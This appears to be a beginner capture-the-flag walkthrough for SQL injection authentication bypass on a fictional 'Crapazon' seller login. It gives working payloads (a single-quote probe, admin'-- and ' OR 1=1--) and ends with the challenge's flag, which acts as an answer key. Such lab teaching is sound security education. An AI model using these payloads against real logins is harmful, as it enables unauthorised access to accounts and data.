Learn Hacking by Actually Hacking

Difficulty

Beginner

Vuln class

SQL Injection (Authentication Bypass)

Steps

// Objective

Bypass the Crapazon seller login form using SQL injection to gain access without valid credentials.

// Tools required

BrowserBurp Suite (optional)

// Step-by-step walkthrough

Identify the target

The seller portal has a standard username and password login form. The backend constructs a SQL query using your input directly. Your goal is to manipulate that query.

Test the input for SQL injection

Enter a single quote in the username field and submit. A SQL error or unexpected behaviour confirms the input is being inserted raw into a query.

Command / Input

Username: '

Output

SQL syntax error near "''' AND password = ''" — confirms SQL injection.

Understand the query structure

The backend query is likely: SELECT * FROM sellers WHERE username = '{input}' AND password = '{input}' Your goal is to make the WHERE clause always return true and comment out the rest.

Craft the bypass payload

The classic auth bypass: close the string with a quote, inject OR 1=1 (always true), then comment out the rest of the query.

Command / Input

Username: admin'-- Password: anything

Output

Executed query: SELECT * FROM sellers WHERE username = 'admin'--' AND password = 'anything' The -- comments out the password check. If admin exists, you're in.

Alternative: OR bypass

If admin doesn't exist, use OR 1=1 to match any row — you'll log in as the first seller in the database.

Command / Input

Username: ' OR 1=1-- Password: anything

Output

⚑ OR 1=1 makes the WHERE clause always evaluate to true, returning the first row from the sellers table regardless of credentials.

// Flag

Flag value

HackrGG{sql1_byp4ss_s3ll3r_p0rt4l}

Revealed in the seller dashboard after successful authentication bypass.

Seller Login — Crapazon